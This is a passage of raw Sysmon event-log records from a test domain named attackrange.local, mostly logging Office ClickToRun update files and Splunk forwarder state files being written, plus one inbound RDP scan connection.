23542300x800000000000000070041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\lync99.exeMD5=787E7DE7283B73AF5AF2CE66DF22965D,SHA256=B72DED446D2A0226CDFAAA01E4662FA696AF8717042D919CD1D40DA8D8346974,IMPHASH=6A5DF82CD5491D62C83F99CCB92290FEtruetrue 23542300x800000000000000070040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Lync2013_Third_Party_Notices.txtMD5=B676D02B436D28C27995C932F5E034C3,SHA256=2A59AE24694D01D50CD6B5D091E4152678757CEE1D6E8565E4F5EC0E6AD4B121,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\lync.icoMD5=0465E28CE866C584259405708CC4EA84,SHA256=38F3C06CB942C9FA1F2DB4C5A041A3A5AF4ACD604F1E182944C296A4AA9E2EBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.692{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LYNC.EXE.MANIFESTMD5=CAA620CC70410B7EEA8BC90E4C134F0B,SHA256=C2AA3378AC9BF9F206CDB6DD9EC735A9DD59E081B78698EDDF45DD5A290496A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.692{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\lync.exeMD5=80AC8331C828441B71AA2C8DFF2D0169,SHA256=31FC7540DBFF66FD9513477E941C06DD6536C088E47BF078AC74DA9F5BD9E9F8,IMPHASH=2A214001D9EFB234EDE52B014D27A774truetrue 354300x800000000000000070036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.594{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com51956-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000070035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\lpklegal.txtMD5=FF0DD27199E3270213807A351DA665B4,SHA256=533D1F7228580147C4BB23436D4CE1F78111EAB2365E53C65DB089A69A3A2739,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\JitV.dllMD5=0B3938499D3EBB6BDAC27339669A4CEE,SHA256=B70A2C313CB76C9E156981C13FCE11ABC46A980D4AF31BFF9DEF1B6A6F12D962,IMPHASH=868E33DA863D13E4AD9849939BE473E2truetrue 23542300x800000000000000070033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\IVY.DLLMD5=82570BCFBC22766E55C3B01868F5352D,SHA256=1D772DD5DAE2D1914C322F261BE8806194C18A608FC018E0218F797DCD7FE59E,IMPHASH=24ED9A8F5F27816A341DE7A67325948Atruetrue 23542300x800000000000000070032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\INTLDATE.DLLMD5=F6CB71D553F7B9F8A71D5F9AF45254DB,SHA256=13F10926FE188A4DDB4ABA165E70868DEDF1C3BFB8530B55C899619EFE9C947E,IMPHASH=8EDD96B0FCB30D8B9D6DF2493240F9C1truetrue 23542300x800000000000000070031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Interceptor.tlbMD5=B6DA774CDBB134C5CEFF958FF44FFDAF,SHA256=9E29FEB3573032807CB22A8B218F9B683C756ED5B91EB6B7E0C1F17CEE14C106,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Interceptor.dllMD5=D8E1F65E921A751F1B93888004851171,SHA256=919760C8F7458292F7781A91C7A74545F5B96CB60FE49C9F1081DE71B7CCC5CC,IMPHASH=B26E837026A9C5A563B578042DE81D60truetrue 23542300x800000000000000070029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\InstallerMainShell.tlbMD5=8C6A0249BD625B9D79BDF5406E1165B8,SHA256=EEA399B7E4DF7E3A82FDB64D95C4C14C6CAA12219FC0C0B0819BF258993745AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\INKCOMMENT.DLLMD5=C210EF1A2355DBA967F21D9ADAE075C9,SHA256=BED02E4E718410AB0AF8F32E065FEF25ABCE507653340BAC52A6C9140A58ED2B,IMPHASH=32E8CE81DF22D28A28EE79A3BA995AFCtruetrue 23542300x800000000000000070027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\IGX.DLLMD5=DF218D5CE32715A8D73CDC3CB18FC747,SHA256=F67AC3C7355E6FDC8EA202FF90E470C23FBFED4CE8665ECABA982BE13478E962,IMPHASH=5789EC7CBF3A74B1C2211EBEDB21E91Dtruetrue 23542300x800000000000000070026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\IEContentService.exeMD5=DFD130078FEFA0898A3E48E8F573EF0D,SHA256=8C98B2213614DC1EB24C14372FBB7718B74D2962B59A4CE4D061E2E4F4BF2650,IMPHASH=563A8C46FA9CE1AF302394DA18087499truetrue 23542300x800000000000000070025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\IEAWSDC.DLLMD5=CE4DA9A800CF168D943B9B27A2C28A2D,SHA256=6A3FFA9FBA7AF8D3F1BD5039A540969B0ECAB9C4D32C9068ECDE3819C4A28A4D,IMPHASH=F880810B68C621F6320ADF5D60CE9F33truetrue 23542300x800000000000000070024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Httpproxy.DLLMD5=91551E4C612EC6927C203A378F7B0F24,SHA256=47A86C39C357A5EFFDF59A1B00718CC59D19B2EBF0ABB12AF3E74C1814FC96DE,IMPHASH=3ED9A5B38D82DAA3D28DC8DB14126F45truetrue 23542300x800000000000000070023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\HeaderPatterns.xmlMD5=8AB5D0B5E28A7980AE9CA122E53C8AF0,SHA256=2D3B3C6CB53400BC52724F507765C2615857714C9AF776DC67724F14AFBFC82E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\GRAPH.ICOMD5=58F5AC079150EECE385C296FFB565A16,SHA256=69C12CB174CCBBF92B9C39532B576703BC058C7FD3E58F28BB723621F64D687D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Graph.exe.manifestMD5=721FFCB742D5224CF5B69750181C69FD,SHA256=8EA9EB36566EFBDFA822000F1EE0278598615AAEC4F13284A2FD86A393DB65D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\GRAPH.EXEMD5=ABBD0409503C102D1A7D840E1F33495D,SHA256=DADB174670ECDC2293A32C9BF95590BE49D9853B1CA61D5E0FAFAB9B3E3F2CFF,IMPHASH=CAED71153A8724718D551C9D90FC143Ctruetrue 23542300x800000000000000070019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\GKWord.dllMD5=0FA8F584DAE03D7C26E0B3CB7D919F7B,SHA256=2C5BA1B7AD14F9071DB1C9262694E8A1FBFE95E8B5E70869B52D7FD92B69EE2B,IMPHASH=49C5FF19D23156A0719A5BC07255B8A9truetrue 23542300x800000000000000070018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\GKPowerPoint.dllMD5=1B71F9132DD3D45F9CA4A5C93B5AB6E5,SHA256=3E9A8D6BC5AB48074BB34B55F231F48F6128B21ABE20B716938189D90E1D9E7E,IMPHASH=AEFE38936C903A2F4CD8C236B90CEB45truetrue 23542300x800000000000000070017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\GKExcel.dllMD5=3073BC0C38B74F7E9581B0646D51B3EF,SHA256=BA2F907A5838B3E1F0DB677D6BB02745FA4231442195F31A11DCDC66B5268615,IMPHASH=FB05AEF00D56661AC4C619C7A0C32071truetrue 23542300x800000000000000070016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\GFX.DLLMD5=668097B2D740561081C0F7A9495457D9,SHA256=7DE7CC50306AD0F6FE3406537092C9F8DC5BBB0FF16E30A55BE3694895FFD293,IMPHASH=8DB07E1669EEDC6BA39BB9AE7A1009DDtruetrue 23542300x800000000000000049770Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:29.960{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1759EDF665287C304A1A5F5D78851248,SHA256=D1708FFCC506B848D279C2737AE9CE398934466FAEFD400D1FB096D130A4F53A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049769Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:29.741{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A0775EF995B29FBE359EA300AB9EF301,SHA256=818BADFC132A6828BE37A650259A0359CAE86C57DFE64F146C21F83701A67224,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mset7.dllMD5=AAFEC1FD0C09C247158FDA3A5E961876,SHA256=60B2665FB9DBBC17233BD60FE0CEECE1E9F00787569B598F9FB0DAC6967F3ADE,IMPHASH=0AA747DED202F5A63586568FF30149E4truetrue 23542300x800000000000000070083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mscss7wre_fr.dubMD5=3F9C72AAE2EB81E397B9E096D4222920,SHA256=DED51AC4258BAA74C23E907FCA68CCA8E156F1915A7C8168D930D3B96C5A2E5D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mscss7wre_es.dubMD5=9937B5E2FBAA8310C39E5E558208F6D6,SHA256=5EBB3B6DC734C4170F2DB9685EDFAB165B3F568AFF2F0AA0D5B24462D5434699,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mscss7wre_en.dubMD5=B11B7D7E00E0A83ADF7F338924D65D84,SHA256=15BCAA306040CD7B4F774FABB0D55F6AF1C588F483CF4DF7107CB5747C8229A4,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mscss7fr.dllMD5=C407AA4F7CA3BE072A61DFD72AB0960D,SHA256=F60C9027627DBA4FADCA88E8A4C17D587735E415D0121DEDE25153F461886291,IMPHASH=40D1CB814EFD8EA384D660FF85EE6EC2truetrue 23542300x800000000000000070079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mscss7es.dllMD5=41D4DFD71B87B9A859B64EFCA24F26C9,SHA256=837E7E222520404D29EEF47BBE341DC93D1AE804B6E66C32BCF5F39316F8034D,IMPHASH=40D1CB814EFD8EA384D660FF85EE6EC2truetrue 23542300x800000000000000070078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mscss7en.dllMD5=B522EE10B343605163BE616F0ECD0B2B,SHA256=201A985895F120B424EDEF1AB4E1E8C2C41BA3EBE409C748EA9F85AF2A033C33,IMPHASH=40D1CB814EFD8EA384D660FF85EE6EC2truetrue 23542300x800000000000000070077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mscss7cm_fr.dubMD5=19C6D918A8895EEDDC638232D93FFAB0,SHA256=191B7F031BD1DD6AE6300EA0EDC3C293B0B6B744272DB386225BC311673FEAFA,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mscss7cm_es.dubMD5=D6D420F3988922A0B6A87780CE335E2F,SHA256=69064D7F906D8D05BCAE38873B7418E5879E09A3BCE762C218EB83354DABC3B3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mscss7cm_en.dubMD5=68F7BF6D79655C3E7A08144FFB0B985E,SHA256=810F070ECB0A7B146C2260C5B69BB41877A84246DDD52FF163C4746D0E9209C9,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSBARCODE.DLLMD5=9F51D586471D63FE37337EB0D17FEA4C,SHA256=EE636B2EE042D53E3F3BA90232E8CC243E28C6C93DE21DC1FF096640FA3B768F,IMPHASH=5838AF1AA7AD33C532C9D07578060BA7truetrue 23542300x800000000000000070073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSAEXP30.DLLMD5=D70AD921BA6DF986EA9C7F99E9919BE0,SHA256=96C9B29B27281F036CCAAC202FD5FEFC148FC7C2F75AC4AC9D4C0B2BD8A62918,IMPHASH=0C72C641468CDF3CECD398D12F0B0745truetrue 23542300x800000000000000070072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSACCESS.VisualElementsManifest.xmlMD5=79A8BFC6DF0E6E7D1B7A816F3A4559D4,SHA256=CD15DC0E3B8488725DB38D9E5177458CF411EA99761E50434A00E795A941EB69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msaccess.exe.manifestMD5=FDFD84078881D112AF51F8F1D9C3F32B,SHA256=563C5CA6487E72039E169C46A256BF6D3F795BA3AEC33C700C3634D0EA25CC21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSACCESS.EXEMD5=AA275E3857116F6EB15B7F0F963B14AE,SHA256=93F1F2F29892E7BAA403FB6C4430CAC62C8D581940976FE2327F20FF256997AE,IMPHASH=5746EBFED2AE6BBFE16CB4951A9FF5D1truetrue 23542300x800000000000000070069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.782{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65F252CB39047E4E2868CB5F1AA4408F,SHA256=08770B5FC64A5911E8E4413F88609C7CDF504B157F697F1AF76EB8D2878ED0A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSACC.OLBMD5=5A62F0EFFD94643E74572B5992C61DF5,SHA256=96B79A5297237A49B742462213537A4259624284F4100E93507AF4AA92D86E22,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:30.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 